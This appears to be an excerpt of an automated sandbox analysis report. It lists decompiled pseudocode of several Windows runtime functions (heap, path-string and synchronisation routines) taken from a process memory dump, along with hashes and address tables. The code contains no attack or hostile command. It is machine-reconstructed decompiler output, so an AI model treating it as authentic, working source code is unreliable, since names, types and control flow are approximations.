0x00000000
0x04a74c89
0x04ab67c3
0x00000000
0x04ab67c3
0x04ab67af
0x04a74c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea53d49c25bb5b78842110864e58d3418d71210039866c1aee5495ccc944b4a3
Instruction ID: d86c428df2617517b8179ac191a4a0a2ac8f648c444eac66a75636cbd097e50f
Opcode Fuzzy Hash: ea53d49c25bb5b78842110864e58d3418d71210039866c1aee5495ccc944b4a3
Instruction Fuzzy Hash: 8C41A375A002289BDB31DF68CD40BEE77B8EF49710F0101A9E948AB241DB74FE84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04B0AA16, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B0AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E04B0ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E04B0AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E04B0AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E04AECB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L04A677F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E04A67D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04B0131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E04AECB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x04b0aa1f
0x04b0aa21
0x04b0aa23
0x04b0aa2b
0x04b0aa30
0x04b0aa36
0x04b0aa39
0x04b0aa42
0x04b0aa75
0x04b0aa7a
0x04b0aa7c
0x04b0aa7c
0x04b0aa88
0x04b0aa8a
0x04b0aa8f
0x04b0ab02
0x04b0ab04
0x04b0aa99
0x04b0aaa8
0x04b0aaaf
0x04b0aab3
0x04b0aacc
0x04b0aad1
0x04b0aad6
0x04b0aae0
0x04b0aaf3
0x04b0aaf9
0x04b0aafe
0x04b0aafe
0x04b0aaf3
0x04b0aad6
0x04b0aab3
0x04b0ab07
0x04b0ab0a
0x04b0ab11
0x04b0ab23
0x04b0ab13
0x04b0ab1c
0x04b0ab1c
0x04b0ab2b
0x04b0ab44
0x04b0ab44
0x04b0ab51
0x04b0ab51
0x04b0aa44
0x04b0aa47
0x04b0aa4c
0x00000000
0x00000000
0x04b0aa5a
0x04b0aa64
0x04b0aa72
0x00000000
0x04b0aa66
0x04b0aa66
0x04b0aa68
0x04b0aa6a
0x00000000
0x04b0aa6a

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: efde2ad58f16beaf12351a38ec2e68b4972914146c8a2d30741509b5dab07537
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: AD31C331F003046BEB158A65CC85BAFFBAADF98316F05C4A9E815A72D1DA74FD41C650

Uniqueness

Uniqueness Score: -1.00%

Function 04A58A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04A58A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x4b3d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E04A8B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E04A5E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4a21180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04A71DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04A83C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04A58999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x04a58a0a
0x04a58a1c
0x04a58a23
0x04a58a2e
0x04a58a30
0x04a58a36
0x04a58a3c
0x04a58a3e
0x04a58a4a
0x04a58a52
0x04a58a9c
0x04a58aae
0x04a58a58
0x04a58a5e
0x04a58a6a
0x04a58a6f
0x04a58a75
0x04a58a7d
0x04a58a85
0x04a58a86
0x04a58a89
0x04a58a93
0x04a58a99
0x04a58a9b
0x00000000
0x04a58aaf
0x04a58abe
0x04a58ac3
0x04a58acb
0x04a58ad7
0x04a58ae0
0x04a58af1
0x00000000
0x04a58af1
0x04a58acd
0x04a58ad5
0x04a58afb
0x04a58afd
0x04a58aff
0x04a58b07
0x04a58b22
0x04a58b24
0x04a58b2a
0x04a58b2e
0x04a58b3f
0x04a58b78
0x04a58b41
0x04a58b52
0x04a58b54
0x04a58b5c
0x04a58b74
0x04a58b74
0x04a58b5c
0x04a58b3f
0x04a58b5e
0x04a58b61
0x04a58b64
0x04a58b64
0x04a58b6c
0x04a58b6c
0x04a58b11
0x04aa9cd5
0x04aa9cd5
0x04a58b17
0x04a58b1a
0x04a58b1a
0x00000000
0x04a58ad5
0x04a58a89

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ab9a58f7af1ffcdab182b2108c7a379b0a5c8f38950ce59f2de26f6f2f378e7
Instruction ID: e15ba80b7a186c064aa17a9d9c8a37506332b56904b076b5b872af9fe5a8bf5b
Opcode Fuzzy Hash: 9ab9a58f7af1ffcdab182b2108c7a379b0a5c8f38950ce59f2de26f6f2f378e7
Instruction Fuzzy Hash: 8D4151B4A012289BDB24EF15C988AAAB3F8EF54300F5145EDDD19D7261E774AE90CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04B0FDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04B0FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E04B0FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E04B10A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E04A67D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E04B01608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E04B12B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E04B0C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E04B0DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E04A67D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E04B0A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x04b0fde7
0x04b0fde8
0x04b0fdec
0x04b0fdee
0x04b0fdf5
0x04b0fdf7
0x04b0fdfc
0x04b0fe19
0x04b0fe22
0x04b0fe26
0x04b0fec6
0x04b0fecd
0x04b0fed5
0x04b0fee7
0x04b0fed7
0x04b0fee0
0x04b0fee0
0x04b0feef
0x04b0ff00
0x04b0ff02
0x04b0ff07
0x04b0ff07
0x00000000
0x04b0feef
0x04b0fe33
0x04b0fe55
0x04b0fe59
0x04b0fe5b
0x04b0fe5e
0x04b0fe69
0x04b0fe6d
0x04b0fe6d
0x04b0fe69
0x04b0fe35
0x04b0fe41
0x04b0fe41
0x04b0fe79
0x04b0fe8b
0x04b0fe7b
0x04b0fe84
0x04b0fe84
0x04b0fe93
0x00000000
0x04b0fea8
0x04b0feba
0x00000000
0x04b0feba
0x04b0fdfe
0x04b0fe01
0x04b0fe02
0x04b0fe08
0x04b0ff0c
0x04b0ff14
0x04b0ff14

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 9e8db7c8fac39da17d0dce60df423b1477a222632fcc56af5b67f9344281c23f
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: ED310532300640AFE7329B68C844F7A7FAAEB85345F18C9D9E5468B7C1DAB4F841C710

Uniqueness

Uniqueness Score: -1.00%

Function 04B0EA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E04B0EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E04A62280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E04B0E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E04A4F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E04A5FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E04B0AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E04B0BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E04A67D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E04AFFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E04A5FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E04B0A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x04b0ea55
0x04b0ea66
0x04b0ea68
0x04b0ea6c
0x04b0ea6f
0x04b0ea72
0x04b0ea75
0x04b0ea7a
0x04b0ea7a
0x04b0ea7e
0x04b0ea80
0x04b0ea85
0x04b0ea8b
0x04b0eab5
0x04b0eabc
0x04b0eabf
0x04b0eabf
0x04b0eaca
0x04b0eace
0x04b0ead0
0x04b0eae4
0x04b0eaeb
0x04b0eaf0
0x04b0eaf5
0x04b0eb09
0x04b0eb0d
0x04b0eb1d
0x04b0eb2d
0x04b0eb38
0x04b0eb3d
0x04b0eb41
0x04b0eb4a
0x04b0eb60
0x04b0eb4c
0x04b0eb52
0x04b0eb59
0x04b0eb59
0x04b0eb68
0x04b0eb71
0x04b0eb71
0x04b0ea8d
0x04b0ea8f
0x04b0ea92
0x04b0ea97
0x04b0ea97
0x04b0ea9b
0x04b0ea9c
0x04b0ea9e
0x04b0eaa6
0x04b0eaa6
0x04b0eb7e

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: fedf337d0b58b49260912786eeaa1849974f2581caf5cb9fe391c166ea2b0e36
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 3031B2326047059FD729DF24C980A5BBBA9FBC4214F048D6DF55287680DB34F809CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04AC69A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E04AC69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x4b3d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04A56C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04AC6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04A89980() >= 0) {
							E04A62280(_t56, 0x4b38778);
							_t77 = 1;
							_t68 = 1;
							if( *0x4b38774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x4b38774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E04A4B6F0(0x4a2c338, 0x4a2c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04A89520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E04A895D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E04A5FFB0(_t68, _t77, 0x4b38778);
				}
				_pop(_t78);
				return E04A8B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x04ac69b5
0x04ac69be
0x04ac69c3
0x04ac69c9
0x04ac69cc
0x04ac69d1
0x04ac69d3
0x04ac69de
0x04ac69e1
0x04ac69ea
0x04ac69f6
0x04ac69fe
0x04ac6a13
0x04ac6a14
0x04ac6a15
0x04ac6a16
0x04ac6a1e
0x04ac6a26
0x04ac6a31
0x04ac6a36
0x04ac6a37
0x04ac6a40
0x04ac6a49
0x04ac6a4a
0x04ac6a53
0x04ac6a59
0x04ac6a5d
0x04ac6a5e
0x04ac6a64
0x04ac6a67
0x04ac6a6a
0x04ac6a6d
0x04ac6a70
0x04ac6a77
0x04ac6a7d
0x04ac6a86
0x04ac6a89
0x04ac6a9c
0x04ac6a9f
0x04ac6aa2
0x04ac6aa5
0x04ac6aaf
0x04ac6ab1
0x04ac6ab8
0x04ac6ab9
0x04ac6abb
0x04ac6abe
0x04ac6ac5
0x04ac6ac5
0x04ac6aaf
0x04ac6a40
0x04ac6a26
0x04ac69fe
0x04ac6ace
0x04ac6ad0
0x04ac6ad3
0x04ac6ad8
0x04ac6adf
0x04ac6adf
0x04ac6ae8
0x04ac6aef
0x04ac6aef
0x04ac6af9
0x04ac6b06

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8e290d6f398c2a7b89749a445c165eefeba34077f3e3d41901da5eee67d19a7
Instruction ID: e8b29401b294c4812a439f745d6c6e8e39ce602bd7ab904d62d47f4ce2390bbc
Opcode Fuzzy Hash: d8e290d6f398c2a7b89749a445c165eefeba34077f3e3d41901da5eee67d19a7
Instruction Fuzzy Hash: F4418AB1D00208AFDB24DFA5CA40BFEBBF8EF48718F04812EE914A7250DB75A905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04A45210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04A45210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E04A452A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04A895D0();
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E04A5EB70(_t54, 0x4b379a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E04A895D0();
								L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E04A5EB70(_t54, 0x4b379a0);
						}
						return _t52;
					}
					L5:
					_t33 = E04A8F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E04A5EB70(_t54, 0x4b379a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04A895D0();
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x04a45220
0x04a45224
0x04aa0d13
0x04aa0d16
0x04aa0d19
0x04a4522a
0x04a4522a
0x04a4522d
0x04a4522d
0x04a45231
0x04a45235
0x04a45239
0x04aa0d5c
0x04aa0d62
0x00000000
0x00000000
0x04aa0d6a
0x04aa0d7b
0x04aa0d7f
0x04aa0d81
0x04aa0d84
0x04aa0d95
0x04aa0d95
0x04aa0d6c
0x04aa0d71
0x04aa0d71
0x04aa0d9a
0x00000000
0x04a4524a
0x04a4524a
0x04a45250
0x04aa0d24
0x04aa0d35
0x04aa0d39
0x04aa0d3b
0x04aa0d3e
0x04aa0d50
0x04aa0d50
0x04aa0d26
0x04aa0d2b
0x04aa0d2b
0x00000000
0x04aa0d55
0x04a45256
0x04a4525b
0x04a45265
0x04aa0da7
0x04a4526b
0x04a4526e
0x04a45272
0x04aa0db1
0x04aa0db4
0x04aa0dc5
0x04aa0dc5
0x04a45272
0x04a45278
0x04a4527e
0x04a4528a
0x04a4528c
0x04a4528d
0x00000000
0x04a45280
0x04a45282
0x04a45288
0x04a4529f
0x04a45292
0x00000000
0x04a45292
0x00000000
0x04a45288
0x04a4527e

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af70c78c95193d995bebff1d28a01ec07cbfe7199e45876bb6af8cdbb370c08
Instruction ID: d51ed3a0935baa9bbcd3310ad3aa9521ed032c833435a58ffdc2f23ca26ad5f0
Opcode Fuzzy Hash: 0af70c78c95193d995bebff1d28a01ec07cbfe7199e45876bb6af8cdbb370c08
Instruction Fuzzy Hash: 6B315932755601FBD725AF18C940F3A7775FF90764F11862AE8164F9A0EB30F910C690

Uniqueness

Uniqueness Score: -1.00%

Function 04A83D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A83D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04A57B60(0, _t61, 0x4a211c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04A57B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04A64620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x04a83d4c
0x04a83d50
0x04a83d55
0x04a83d5e
0x04abe79a
0x00000000
0x04abe79a
0x04a83d68
0x04abe789
0x04a83d9d
0x04a83da3
0x04a83daf
0x04a83db5
0x04a83dbc
0x04a83dc4
0x04a83dc9
0x04a83dce
0x04abe7ae
0x04abe7ae
0x04a83dde
0x04a83de2
0x04a83de7
0x04a83e0d
0x04a83e13
0x04a83e16
0x04a83e1e
0x04a83e25
0x04a83e28
0x00000000
0x00000000
0x04a83e2a
0x04a83e2f
0x04a83e37
0x04a83e37
0x00000000
0x04a83e37
0x04a83e31
0x00000000
0x04a83e31
0x04a83e20
